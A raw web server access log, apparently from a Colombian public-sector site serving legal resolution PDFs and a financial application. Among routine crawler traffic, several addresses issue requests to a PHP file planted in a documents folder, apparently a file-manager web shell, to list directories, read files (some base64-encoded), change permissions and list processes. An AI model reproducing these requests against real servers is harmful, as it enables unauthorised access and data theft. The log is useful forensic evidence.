3.224.220.101 - - [26/Apr/2024:07:04:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1056.pdf HTTP/1.1" 200 54463
172.22.2.4 - - [26/Apr/2024:07:04:15 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
23.22.35.162 - - [26/Apr/2024:07:04:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1055.pdf HTTP/1.1" 200 65967
23.22.35.162 - - [26/Apr/2024:07:04:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1054.pdf HTTP/1.1" 200 62529
52.70.240.171 - - [26/Apr/2024:07:04:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1053.pdf HTTP/1.1" 200 60597
23.22.35.162 - - [26/Apr/2024:07:04:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1052.pdf HTTP/1.1" 200 62940
47.128.51.52 - - [26/Apr/2024:07:04:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+201-250%5C&f=00000214.tif&ft=exe HTTP/1.1" 200 3119
47.128.51.52 - - [26/Apr/2024:07:04:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
23.22.35.162 - - [26/Apr/2024:07:04:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1051.pdf HTTP/1.1" 200 405256
47.128.51.52 - - [26/Apr/2024:07:04:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.51.52 - - [26/Apr/2024:07:04:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.51.52 - - [26/Apr/2024:07:04:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.51.52 - - [26/Apr/2024:07:04:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.51.52 - - [26/Apr/2024:07:04:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.51.52 - - [26/Apr/2024:07:04:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.51.52 - - [26/Apr/2024:07:04:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.51.52 - - [26/Apr/2024:07:04:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.51.52 - - [26/Apr/2024:07:04:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_tif HTTP/1.1" 200 175
3.224.220.101 - - [26/Apr/2024:07:04:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1050.pdf HTTP/1.1" 200 363455
23.22.35.162 - - [26/Apr/2024:07:04:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1049.pdf HTTP/1.1" 200 361035
3.224.220.101 - - [26/Apr/2024:07:04:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1048.pdf HTTP/1.1" 200 333013
23.22.35.162 - - [26/Apr/2024:07:04:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1047.pdf HTTP/1.1" 200 363732
23.22.35.162 - - [26/Apr/2024:07:04:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1046.pdf HTTP/1.1" 200 360220
47.128.37.91 - - [26/Apr/2024:07:04:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cxampp%5Cxampp%5Chtdocs%5Cphpscripts&f=opinion.php HTTP/1.1" 200 4353
3.224.220.101 - - [26/Apr/2024:07:04:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1045.pdf HTTP/1.1" 200 206756
47.128.37.91 - - [26/Apr/2024:07:04:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.37.91 - - [26/Apr/2024:07:04:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_php HTTP/1.1" 200 79
47.128.37.91 - - [26/Apr/2024:07:04:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.37.91 - - [26/Apr/2024:07:04:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
185.196.11.177 - - [26/Apr/2024:07:04:56 -0500] "GET / HTTP/1.1" 200 319
47.128.37.91 - - [26/Apr/2024:07:04:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.37.91 - - [26/Apr/2024:07:04:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.37.91 - - [26/Apr/2024:07:04:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.37.91 - - [26/Apr/2024:07:04:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.37.91 - - [26/Apr/2024:07:04:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.37.91 - - [26/Apr/2024:07:04:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
52.70.240.171 - - [26/Apr/2024:07:05:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1044.pdf HTTP/1.1" 200 211352
52.70.240.171 - - [26/Apr/2024:07:05:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1043.pdf HTTP/1.1" 200 210797
3.224.220.101 - - [26/Apr/2024:07:05:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1042.pdf HTTP/1.1" 200 280176
172.22.2.4 - - [26/Apr/2024:07:03:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
23.22.35.162 - - [26/Apr/2024:07:05:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1041.pdf HTTP/1.1" 200 250516
3.224.220.101 - - [26/Apr/2024:07:05:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1040.pdf HTTP/1.1" 200 224191
47.128.26.89 - - [26/Apr/2024:07:05:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cxampp%5Cxampp%5Chtdocs%5CResiduos&sort=3a HTTP/1.1" 200 3898
47.128.26.89 - - [26/Apr/2024:07:05:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
3.224.220.101 - - [26/Apr/2024:07:05:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1039.pdf HTTP/1.1" 200 229397
47.128.26.89 - - [26/Apr/2024:07:05:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=arrow_ltr HTTP/1.1" 200 88
52.70.240.171 - - [26/Apr/2024:07:05:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1038.pdf HTTP/1.1" 200 588497
23.22.35.162 - - [26/Apr/2024:07:05:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1037.pdf HTTP/1.1" 200 349544
52.70.240.171 - - [26/Apr/2024:07:05:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1036.pdf HTTP/1.1" 200 467870
3.224.220.101 - - [26/Apr/2024:07:05:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1035.pdf HTTP/1.1" 200 566924
3.224.220.101 - - [26/Apr/2024:07:05:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1034.pdf HTTP/1.1" 200 56461
172.22.2.4 - - [26/Apr/2024:07:05:44 -0500] "GET /BLA/boletinlegal/actas/079-2013.pdf HTTP/1.1" 200 1500109
52.70.240.171 - - [26/Apr/2024:07:05:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1033.pdf HTTP/1.1" 200 24222
47.128.50.149 - - [26/Apr/2024:07:05:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=3&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5C&f=wp-lists.min.js HTTP/1.1" 200 5560
47.128.50.149 - - [26/Apr/2024:07:05:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.50.149 - - [26/Apr/2024:07:05:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_js HTTP/1.1" 200 131
47.128.50.149 - - [26/Apr/2024:07:05:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.50.149 - - [26/Apr/2024:07:05:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.50.149 - - [26/Apr/2024:07:05:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.50.149 - - [26/Apr/2024:07:05:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.50.149 - - [26/Apr/2024:07:05:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.50.149 - - [26/Apr/2024:07:05:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.50.149 - - [26/Apr/2024:07:05:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.50.149 - - [26/Apr/2024:07:05:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
52.70.240.171 - - [26/Apr/2024:07:05:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1032.pdf HTTP/1.1" 200 300055
52.70.240.171 - - [26/Apr/2024:07:05:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1031.pdf HTTP/1.1" 200 299816
172.22.2.4 - - [26/Apr/2024:07:04:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45104
3.224.220.101 - - [26/Apr/2024:07:05:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1030.pdf HTTP/1.1" 200 298830
172.22.2.4 - - [26/Apr/2024:07:04:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45535
52.70.240.171 - - [26/Apr/2024:07:06:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1029.pdf HTTP/1.1" 200 445440
23.22.35.162 - - [26/Apr/2024:07:06:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1028.pdf HTTP/1.1" 200 307165
47.128.126.191 - - [26/Apr/2024:07:06:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5Ctheme-compat&f=header.php HTTP/1.1" 200 2909
23.22.35.162 - - [26/Apr/2024:07:06:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1027.pdf HTTP/1.1" 200 331369
3.224.220.101 - - [26/Apr/2024:07:06:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1026.pdf HTTP/1.1" 200 331691
3.224.220.101 - - [26/Apr/2024:07:06:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1025.pdf HTTP/1.1" 200 328607
3.224.220.101 - - [26/Apr/2024:07:06:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1024.pdf HTTP/1.1" 200 336773
52.70.240.171 - - [26/Apr/2024:07:06:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1022.pdf HTTP/1.1" 200 212818
23.22.35.162 - - [26/Apr/2024:07:06:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1023.pdf HTTP/1.1" 200 420156
52.70.240.171 - - [26/Apr/2024:07:06:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1021.pdf HTTP/1.1" 200 219638
47.128.97.52 - - [26/Apr/2024:07:06:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=1&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ctextiles%5Cimages%5C&f=page86_thumbnail.jpg HTTP/1.1" 200 16155
47.128.97.52 - - [26/Apr/2024:07:06:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.97.52 - - [26/Apr/2024:07:06:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
47.128.97.52 - - [26/Apr/2024:07:06:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.97.52 - - [26/Apr/2024:07:06:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.97.52 - - [26/Apr/2024:07:06:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.97.52 - - [26/Apr/2024:07:06:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.97.52 - - [26/Apr/2024:07:06:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.97.52 - - [26/Apr/2024:07:06:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.97.52 - - [26/Apr/2024:07:06:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
23.22.35.162 - - [26/Apr/2024:07:06:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1020.pdf HTTP/1.1" 200 217241
47.128.97.52 - - [26/Apr/2024:07:06:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
23.22.35.162 - - [26/Apr/2024:07:06:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1019.pdf HTTP/1.1" 200 201683
52.70.240.171 - - [26/Apr/2024:07:06:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1018.pdf HTTP/1.1" 200 175280
23.22.35.162 - - [26/Apr/2024:07:06:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1017.pdf HTTP/1.1" 200 290115
23.22.35.162 - - [26/Apr/2024:07:06:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1016.pdf HTTP/1.1" 200 209422
23.22.35.162 - - [26/Apr/2024:07:06:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1015.pdf HTTP/1.1" 200 211895
47.128.29.176 - - [26/Apr/2024:07:06:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=4&d=C%3A%5CAmbienteBogota%5Cauto%5C&f=formlight1.htm HTTP/1.1" 200 5179
47.128.29.176 - - [26/Apr/2024:07:06:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.29.176 - - [26/Apr/2024:07:06:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.29.176 - - [26/Apr/2024:07:06:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.29.176 - - [26/Apr/2024:07:06:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.29.176 - - [26/Apr/2024:07:06:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.29.176 - - [26/Apr/2024:07:06:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_htm HTTP/1.1" 200 79
47.128.29.176 - - [26/Apr/2024:07:06:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.29.176 - - [26/Apr/2024:07:06:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.29.176 - - [26/Apr/2024:07:06:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.29.176 - - [26/Apr/2024:07:06:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
3.224.220.101 - - [26/Apr/2024:07:07:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1014.pdf HTTP/1.1" 200 194764
3.224.220.101 - - [26/Apr/2024:07:07:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1013.pdf HTTP/1.1" 200 187644
181.53.12.229 - - [26/Apr/2024:07:07:07 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 35075
181.53.12.229 - - [26/Apr/2024:07:07:08 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.229 - - [26/Apr/2024:07:07:08 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [26/Apr/2024:07:07:08 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [26/Apr/2024:07:07:08 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [26/Apr/2024:07:07:08 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [26/Apr/2024:07:07:08 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [26/Apr/2024:07:07:08 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
3.224.220.101 - - [26/Apr/2024:07:07:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1012.pdf HTTP/1.1" 200 548953
181.53.12.229 - - [26/Apr/2024:07:07:08 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 28339
181.53.12.229 - - [26/Apr/2024:07:07:08 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 28339
181.53.12.229 - - [26/Apr/2024:07:07:08 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 28339
181.53.12.229 - - [26/Apr/2024:07:07:08 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 28339
181.53.12.229 - - [26/Apr/2024:07:07:09 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 28339
181.53.12.229 - - [26/Apr/2024:07:07:09 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 28339
181.53.12.229 - - [26/Apr/2024:07:07:09 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1396
181.53.12.229 - - [26/Apr/2024:07:07:09 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1392
181.53.12.229 - - [26/Apr/2024:07:07:09 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1400
181.53.12.229 - - [26/Apr/2024:07:07:09 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1392
181.53.12.229 - - [26/Apr/2024:07:07:10 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1400
181.53.12.229 - - [26/Apr/2024:07:07:10 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1392
181.53.12.229 - - [26/Apr/2024:07:07:10 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1400
23.22.35.162 - - [26/Apr/2024:07:07:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1011.pdf HTTP/1.1" 200 239782
181.53.12.229 - - [26/Apr/2024:07:07:12 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 6016
201.245.192.253 - - [26/Apr/2024:07:07:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41015
181.53.12.229 - - [26/Apr/2024:07:07:14 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 159007
181.53.12.229 - - [26/Apr/2024:07:07:15 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.229 - - [26/Apr/2024:07:07:15 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [26/Apr/2024:07:07:15 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [26/Apr/2024:07:07:15 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [26/Apr/2024:07:07:15 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [26/Apr/2024:07:07:15 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [26/Apr/2024:07:07:15 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
3.224.220.101 - - [26/Apr/2024:07:07:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1010.pdf HTTP/1.1" 200 180599
3.224.220.101 - - [26/Apr/2024:07:07:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1009.pdf HTTP/1.1" 200 201284
47.128.97.43 - - [26/Apr/2024:07:07:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=C%3A%5CAmbienteBogota%5Ccounter%5Cdigits%5Cbrush%5C&sort=3a HTTP/1.1" 200 3737
47.128.97.43 - - [26/Apr/2024:07:07:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=arrow_ltr HTTP/1.1" 200 88
47.128.97.43 - - [26/Apr/2024:07:07:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_png HTTP/1.1" 200 175
3.224.220.101 - - [26/Apr/2024:07:07:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1008.pdf HTTP/1.1" 200 669481
23.22.35.162 - - [26/Apr/2024:07:07:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1007.pdf HTTP/1.1" 200 183015
23.22.35.162 - - [26/Apr/2024:07:07:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1006.pdf HTTP/1.1" 200 370113
216.245.221.92 - - [26/Apr/2024:07:07:36 -0500] "HEAD / HTTP/1.1" 200 -
52.70.240.171 - - [26/Apr/2024:07:07:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1005.pdf HTTP/1.1" 200 251955
3.224.220.101 - - [26/Apr/2024:07:07:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1004.pdf HTTP/1.1" 200 238939
52.70.240.171 - - [26/Apr/2024:07:07:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1003.pdf HTTP/1.1" 200 183577
47.128.25.125 - - [26/Apr/2024:07:07:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=processes&d=C%3A%5CAmbienteBogota%5Ccounter%5Cdigits%5Cindgph%5C HTTP/1.1" 200 3647
52.70.240.171 - - [26/Apr/2024:07:07:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1002.pdf HTTP/1.1" 200 384307
23.22.35.162 - - [26/Apr/2024:07:07:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1001.pdf HTTP/1.1" 200 202570
3.224.220.101 - - [26/Apr/2024:07:07:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1000.pdf HTTP/1.1" 200 363840
3.224.220.101 - - [26/Apr/2024:07:08:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0999.pdf HTTP/1.1" 200 175543
181.53.12.229 - - [26/Apr/2024:07:08:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 2116500
52.70.240.171 - - [26/Apr/2024:07:08:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0998.pdf HTTP/1.1" 200 669696
181.53.12.229 - - [26/Apr/2024:07:08:04 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 95385
23.22.35.162 - - [26/Apr/2024:07:08:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0997.pdf HTTP/1.1" 200 244985
47.128.97.37 - - [26/Apr/2024:07:08:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cxampp%5Cxampp%5CMercuryMail&f=basic.pnc HTTP/1.1" 200 2854
52.70.240.171 - - [26/Apr/2024:07:08:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0996.pdf HTTP/1.1" 200 244362
23.22.35.162 - - [26/Apr/2024:07:08:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0995.pdf HTTP/1.1" 200 190694
181.53.12.229 - - [26/Apr/2024:07:08:16 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 263898
3.224.220.101 - - [26/Apr/2024:07:08:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0994.pdf HTTP/1.1" 200 219368
23.22.35.162 - - [26/Apr/2024:07:08:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0993.pdf HTTP/1.1" 200 203488
23.22.35.162 - - [26/Apr/2024:07:08:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0992.pdf HTTP/1.1" 200 381689
52.70.240.171 - - [26/Apr/2024:07:08:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0991.pdf HTTP/1.1" 200 1280532
47.128.18.162 - - [26/Apr/2024:07:08:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ctextiles%5Cimages%5C&f=page113_thumbnail.jpg HTTP/1.1" 200 2901
3.224.220.101 - - [26/Apr/2024:07:08:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0990.pdf HTTP/1.1" 200 211589
3.224.220.101 - - [26/Apr/2024:07:08:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0989.pdf HTTP/1.1" 200 207936
52.70.240.171 - - [26/Apr/2024:07:08:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0988.pdf HTTP/1.1" 200 215509
52.70.240.171 - - [26/Apr/2024:07:08:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0987.pdf HTTP/1.1" 200 107422
23.22.35.162 - - [26/Apr/2024:07:08:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0986.pdf HTTP/1.1" 200 333222
52.70.240.171 - - [26/Apr/2024:07:08:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0985.pdf HTTP/1.1" 200 269684
3.224.220.101 - - [26/Apr/2024:07:09:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0984.pdf HTTP/1.1" 200 235060
